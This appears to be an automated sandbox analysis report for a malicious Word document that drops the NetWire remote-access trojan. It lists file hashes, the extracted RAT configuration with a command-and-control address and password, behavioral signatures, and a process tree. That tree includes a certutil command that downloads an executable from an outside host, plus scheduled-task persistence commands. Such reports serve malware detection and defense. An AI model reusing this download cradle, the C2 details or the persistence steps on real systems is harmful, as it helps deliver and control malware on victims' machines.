Analysis
-
max time kernel
119s -
max time network
135s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system -
submitted
30-09-2022 10:31
Behavioral task
behavioral1
Sample
RFQ 80479040.doc
Resource
win7-20220812-en
General
-
Target
RFQ 80479040.doc
-
Size
62KB
-
MD5
6328c4a16d653cb10c3b042301b2d6c3
-
SHA1
4dba059a50044581f2741868ce850618a042f0b5
-
SHA256
9e7f45fc3fe9b1849e1308f416aa57cf62588ca43359630649943b40fcf07856
-
SHA512
6d46cc27a4786b0072f1a53cdbd6e3c42e646b6f441ef39eee0630e37863c90bf8c8e40ee026af7cd98ac14474ff96b787ccab941f995fd7db80d0dcc4c2725f
-
SSDEEP
384:OkUgY5j96eYPKNiaI1WAE7OCb8iSUR/8dEv8krqrf4INzte/DZeIESy3uGjGWi2S:OP5I5I/q/qsfZ3qHGjG/owKSqXI
Malware Config
Extracted
netwire
37.0.14.206:3384
-
activex_autorun
false
-
copy_executable
true
-
delete_original
false
-
host_id
HostId-%Rand%
-
install_path
%AppData%\Install\Host.exe
-
keylogger_dir
%AppData%\Logs\
-
lock_executable
true
-
offline_keylogger
true
-
password
Password234
-
registry_autorun
false
-
use_mutex
false
Signatures
-
NetWire RAT payload 5 IoCs
Processes:
resource yara_rule behavioral2/memory/5024-151-0x0000000000400000-0x0000000000433000-memory.dmp netwire behavioral2/memory/5024-154-0x0000000000400000-0x0000000000433000-memory.dmp netwire behavioral2/memory/5024-158-0x0000000000400000-0x0000000000433000-memory.dmp netwire behavioral2/memory/3908-167-0x0000000000400000-0x0000000000433000-memory.dmp netwire behavioral2/memory/3908-168-0x0000000000400000-0x0000000000433000-memory.dmp netwire -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
certutil.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 2648 4672 certutil.exe WINWORD.EXE -
Downloads MZ/PE file
-
Executes dropped EXE 5 IoCs
Processes:
WinUpdate.exeWinUpdate.exeHost.exeHost.exeHost.exepid process 852 WinUpdate.exe 5024 WinUpdate.exe 2780 Host.exe 4220 Host.exe 3908 Host.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WinUpdate.exeHost.exeWinUpdate.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation WinUpdate.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation Host.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation WinUpdate.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Suspicious use of SetThreadContext 2 IoCs
Processes:
WinUpdate.exeHost.exedescription pid process target process PID 852 set thread context of 5024 852 WinUpdate.exe WinUpdate.exe PID 2780 set thread context of 3908 2780 Host.exe Host.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 4736 schtasks.exe 3212 schtasks.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 4672 WINWORD.EXE 4672 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
WinUpdate.exeHost.exepid process 852 WinUpdate.exe 2780 Host.exe 2780 Host.exe 2780 Host.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
WinUpdate.exeHost.exedescription pid process Token: SeDebugPrivilege 852 WinUpdate.exe Token: SeDebugPrivilege 2780 Host.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
WINWORD.EXEpid process 4672 WINWORD.EXE 4672 WINWORD.EXE 4672 WINWORD.EXE 4672 WINWORD.EXE 4672 WINWORD.EXE 4672 WINWORD.EXE 4672 WINWORD.EXE -
Suspicious use of WriteProcessMemory 39 IoCs
Processes:
WINWORD.EXEWinUpdate.exeWinUpdate.exeHost.exedescription pid process target process PID 4672 wrote to memory of 2648 4672 WINWORD.EXE certutil.exe PID 4672 wrote to memory of 2648 4672 WINWORD.EXE certutil.exe PID 4672 wrote to memory of 852 4672 WINWORD.EXE WinUpdate.exe PID 4672 wrote to memory of 852 4672 WINWORD.EXE WinUpdate.exe PID 4672 wrote to memory of 852 4672 WINWORD.EXE WinUpdate.exe PID 852 wrote to memory of 4736 852 WinUpdate.exe schtasks.exe PID 852 wrote to memory of 4736 852 WinUpdate.exe schtasks.exe PID 852 wrote to memory of 4736 852 WinUpdate.exe schtasks.exe PID 852 wrote to memory of 5024 852 WinUpdate.exe WinUpdate.exe PID 852 wrote to memory of 5024 852 WinUpdate.exe WinUpdate.exe PID 852 wrote to memory of 5024 852 WinUpdate.exe WinUpdate.exe PID 852 wrote to memory of 5024 852 WinUpdate.exe WinUpdate.exe PID 852 wrote to memory of 5024 852 WinUpdate.exe WinUpdate.exe PID 852 wrote to memory of 5024 852 WinUpdate.exe WinUpdate.exe PID 852 wrote to memory of 5024 852 WinUpdate.exe WinUpdate.exe PID 852 wrote to memory of 5024 852 WinUpdate.exe WinUpdate.exe PID 852 wrote to memory of 5024 852 WinUpdate.exe WinUpdate.exe PID 852 wrote to memory of 5024 852 WinUpdate.exe WinUpdate.exe PID 852 wrote to memory of 5024 852 WinUpdate.exe WinUpdate.exe PID 5024 wrote to memory of 2780 5024 WinUpdate.exe Host.exe PID 5024 wrote to memory of 2780 5024 WinUpdate.exe Host.exe PID 5024 wrote to memory of 2780 5024 WinUpdate.exe Host.exe PID 2780 wrote to memory of 3212 2780 Host.exe schtasks.exe PID 2780 wrote to memory of 3212 2780 Host.exe schtasks.exe PID 2780 wrote to memory of 3212 2780 Host.exe schtasks.exe PID 2780 wrote to memory of 4220 2780 Host.exe Host.exe PID 2780 wrote to memory of 4220 2780 Host.exe Host.exe PID 2780 wrote to memory of 4220 2780 Host.exe Host.exe PID 2780 wrote to memory of 3908 2780 Host.exe Host.exe PID 2780 wrote to memory of 3908 2780 Host.exe Host.exe PID 2780 wrote to memory of 3908 2780 Host.exe Host.exe PID 2780 wrote to memory of 3908 2780 Host.exe Host.exe PID 2780 wrote to memory of 3908 2780 Host.exe Host.exe PID 2780 wrote to memory of 3908 2780 Host.exe Host.exe PID 2780 wrote to memory of 3908 2780 Host.exe Host.exe PID 2780 wrote to memory of 3908 2780 Host.exe Host.exe PID 2780 wrote to memory of 3908 2780 Host.exe Host.exe PID 2780 wrote to memory of 3908 2780 Host.exe Host.exe PID 2780 wrote to memory of 3908 2780 Host.exe Host.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\RFQ 80479040.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4672 -
C:\Windows\System32\certutil.exe"C:\Windows\System32\certutil.exe" -urlcache -split -f https://teqturn.com/goblin/ea05f1fD14F2Jju.exe C:\Users\Admin\AppData\Local\Temp\WinUpdate.exe2⤵
- Process spawned unexpected child process
PID:2648 -
C:\Users\Admin\AppData\Local\Temp\WinUpdate.exe"C:\Users\Admin\AppData\Local\Temp\WinUpdate.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:852 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NksNHqr" /XML "C:\Users\Admin\AppData\Local\Temp\tmp251C.tmp"3⤵
- Creates scheduled task(s)
PID:4736 -
C:\Users\Admin\AppData\Local\Temp\WinUpdate.exe"{path}"3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5024 -
C:\Users\Admin\AppData\Roaming\Install\Host.exe"C:\Users\Admin\AppData\Roaming\Install\Host.exe"4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2780 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NksNHqr" /XML "C:\Users\Admin\AppData\Local\Temp\tmp90E6.tmp"5⤵
- Creates scheduled task(s)
PID:3212 -
C:\Users\Admin\AppData\Roaming\Install\Host.exe"{path}"5⤵
- Executes dropped EXE
PID:4220 -
C:\Users\Admin\AppData\Roaming\Install\Host.exe"{path}"5⤵
- Executes dropped EXE
PID:3908
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
882KB
MD595b5d76bfb2204011333248cc121b5a4
SHA16faea7983c34f12cec7d22184be0eb1693e0abaf
SHA256849590a841b815d047cfdadf4f430a64b8b1ac03518a0e1f18923662e7f4563e
SHA512966343713d2174f09e1f5aa4493eb79bfca3b6504ff18253449e7a153c8a249f4a52e9d0a7e7319817b284fbaa80dff94e034772cc32fb3635457cbb1f3fc152
-
Filesize
882KB
MD595b5d76bfb2204011333248cc121b5a4
SHA16faea7983c34f12cec7d22184be0eb1693e0abaf
SHA256849590a841b815d047cfdadf4f430a64b8b1ac03518a0e1f18923662e7f4563e
SHA512966343713d2174f09e1f5aa4493eb79bfca3b6504ff18253449e7a153c8a249f4a52e9d0a7e7319817b284fbaa80dff94e034772cc32fb3635457cbb1f3fc152
-
Filesize
882KB
MD595b5d76bfb2204011333248cc121b5a4
SHA16faea7983c34f12cec7d22184be0eb1693e0abaf
SHA256849590a841b815d047cfdadf4f430a64b8b1ac03518a0e1f18923662e7f4563e
SHA512966343713d2174f09e1f5aa4493eb79bfca3b6504ff18253449e7a153c8a249f4a52e9d0a7e7319817b284fbaa80dff94e034772cc32fb3635457cbb1f3fc152
-
Filesize
1KB
MD5e3110e1fc5bfa53e5636b145c05a9dd2
SHA1ccaaa930eae7676f078baaafef310a0e60e2b196
SHA2567bd775873865bef88fe486aba38d1e26483aa5d9475b8f51149458eda843ba3a
SHA512aa095af6006f03afd5003013b7e9be9e338811ee0ca1647d37d9ef203e826c7e67486f81861f70653eb6125d2f49be6878d7d705eeff8936d2fd2ca00450a314
-
Filesize
1KB
MD5e3110e1fc5bfa53e5636b145c05a9dd2
SHA1ccaaa930eae7676f078baaafef310a0e60e2b196
SHA2567bd775873865bef88fe486aba38d1e26483aa5d9475b8f51149458eda843ba3a
SHA512aa095af6006f03afd5003013b7e9be9e338811ee0ca1647d37d9ef203e826c7e67486f81861f70653eb6125d2f49be6878d7d705eeff8936d2fd2ca00450a314
-
Filesize
882KB
MD595b5d76bfb2204011333248cc121b5a4
SHA16faea7983c34f12cec7d22184be0eb1693e0abaf
SHA256849590a841b815d047cfdadf4f430a64b8b1ac03518a0e1f18923662e7f4563e
SHA512966343713d2174f09e1f5aa4493eb79bfca3b6504ff18253449e7a153c8a249f4a52e9d0a7e7319817b284fbaa80dff94e034772cc32fb3635457cbb1f3fc152
-
Filesize
882KB
MD595b5d76bfb2204011333248cc121b5a4
SHA16faea7983c34f12cec7d22184be0eb1693e0abaf
SHA256849590a841b815d047cfdadf4f430a64b8b1ac03518a0e1f18923662e7f4563e
SHA512966343713d2174f09e1f5aa4493eb79bfca3b6504ff18253449e7a153c8a249f4a52e9d0a7e7319817b284fbaa80dff94e034772cc32fb3635457cbb1f3fc152
-
Filesize
882KB
MD595b5d76bfb2204011333248cc121b5a4
SHA16faea7983c34f12cec7d22184be0eb1693e0abaf
SHA256849590a841b815d047cfdadf4f430a64b8b1ac03518a0e1f18923662e7f4563e
SHA512966343713d2174f09e1f5aa4493eb79bfca3b6504ff18253449e7a153c8a249f4a52e9d0a7e7319817b284fbaa80dff94e034772cc32fb3635457cbb1f3fc152
-
Filesize
882KB
MD595b5d76bfb2204011333248cc121b5a4
SHA16faea7983c34f12cec7d22184be0eb1693e0abaf
SHA256849590a841b815d047cfdadf4f430a64b8b1ac03518a0e1f18923662e7f4563e
SHA512966343713d2174f09e1f5aa4493eb79bfca3b6504ff18253449e7a153c8a249f4a52e9d0a7e7319817b284fbaa80dff94e034772cc32fb3635457cbb1f3fc152